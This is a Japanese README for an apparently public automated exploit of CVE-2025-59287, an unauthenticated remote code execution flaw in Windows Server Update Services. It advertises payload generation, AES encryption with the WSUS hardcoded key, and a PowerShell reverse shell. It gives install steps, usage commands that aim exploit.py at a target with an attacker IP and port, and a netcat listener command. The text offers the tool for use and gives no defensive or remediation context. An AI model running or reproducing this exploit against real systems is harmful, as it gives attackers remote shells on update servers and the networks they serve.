
CVE-2025-59287の自動エクスプロイト。WSUSにおける未認証のRCEであり、ペイロード生成、リバースシェルリスナー、ハードコードされたキーによるAES暗号化を備えています。
Windows Server Update Services (WSUS) の未認証リモートコード実行の脆弱性に対する自動化エクスプロイト。
✅ 完全自動化されたペイロード生成
✅ ysoserial.NET 依存関係の自動ダウンロード
✅ 内蔵リバースシェルリスナー
✅ クロスプラットフォーム対応 (Windows/Linux/Mac)
✅ WSUS ハードコード鍵による AES 暗号化
✅ PowerShell リバースシェルペイロード
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
エクスプロイトファイルをクローンまたはダウンロード
cd CVE-2025-59287-exploit
エクスプロイトを実行 (ysoserial.NET を自動ダウンロード)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
ターミナル 1: netcat リスナーを起動
nc -lvnp 4444
ターミナル 2: 内蔵リスナーなしでエクスプロイトを実行
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener